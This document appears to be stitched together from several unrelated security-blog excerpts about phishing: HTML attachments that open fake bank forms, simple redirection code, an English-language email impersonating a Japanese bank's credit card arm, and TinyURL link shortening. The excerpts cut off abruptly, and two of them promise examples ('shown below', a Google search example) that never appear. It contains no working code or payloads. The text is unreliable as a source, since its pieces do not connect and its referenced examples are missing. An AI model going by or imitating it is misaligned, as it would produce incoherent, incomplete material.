We have recently come across a different type of phishing attack that involves JavaScript being used to attempt to trick users into submitting sensitive banking-related information. This type of attack usually carries an HTML file attachment. The HTML file will locally open a look-alike bank submission form with the capability to pass critical user information to the phisher’s server.
Case 1
In the past, we monitored attacks with a similar type of file attachment, but they contained straightforward redirection code. There are different ways to redirect users to the desired location. One of the simpler HTML codes for redirection is shown below:
Symantec has recently observed an English phishing email that appears to be an official notification from a credit card company affiliated with a major Japanese bank, claiming that a limitation has been placed on the email recipient’s credit card due to a violation. The recipient is asked to provide information relevant to their account.
Last year we observed a similar phishing attempt that was trying to leverage this bank’s brand. However, that email was in the Japanese language and guided unsuspecting users to a Japanese-language phishing website. This new attack starts with an English email message, but links to a site that is written in Japanese where the recipient is asked to give up personal information such as a credit card number, credit verification value, personal identification number (PIN), and validity time. The spammers address the use of English in the email—excusing themselves for sending a message in English instead of in Japanese—...
You may or may not know about TinyURL, which is a Web service that provides short aliases for the redirection of long URLs. The TinyURL homepage includes a form that's used to submit a long URL for shortening. For each URL entered, the server adds a new alias in its hashed database and returns a shortened URL.
For example, a good use of the TinyURL service would be changing the result from a Google search for Indian wonders:
